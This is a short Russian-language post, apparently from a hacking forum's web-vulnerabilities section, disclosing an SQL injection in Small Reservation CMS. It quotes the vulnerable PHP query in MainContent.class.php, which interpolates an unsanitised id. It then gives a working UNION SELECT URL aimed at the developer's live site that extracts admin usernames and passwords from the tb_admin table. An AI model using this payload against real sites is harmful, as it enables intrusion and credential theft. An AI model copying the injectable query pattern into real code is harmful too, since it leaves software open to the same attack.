Small Reservation CMS

Discussion in 'Веб-уязвимости' started by Ded MustD!e, 26 Sep 2009.

  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимость: SQL-Inj
    Продукт: Small Reservation CMS
    Уязвимый файл MainContent.class.php
    Код:
    PHP:
    if($res $this->db->query("SELECT rentobject_id,name,marke,
                                weight,power,engine,imgurl
                                FROM tb_
    {$this->subcmd}
                                WHERE rentobject_id = 
    {$this->id}"))
    Пример на сайте разработчика:
    Code:
    http://www.fastproject.ch/smallCMS/index.php?pageid=8&rentobject_id=1+union+select+1,concat_ws(0x3a,admin_user,admin_pw),3,4,5,6,7+from+tb_admin--
     
    7 people like this.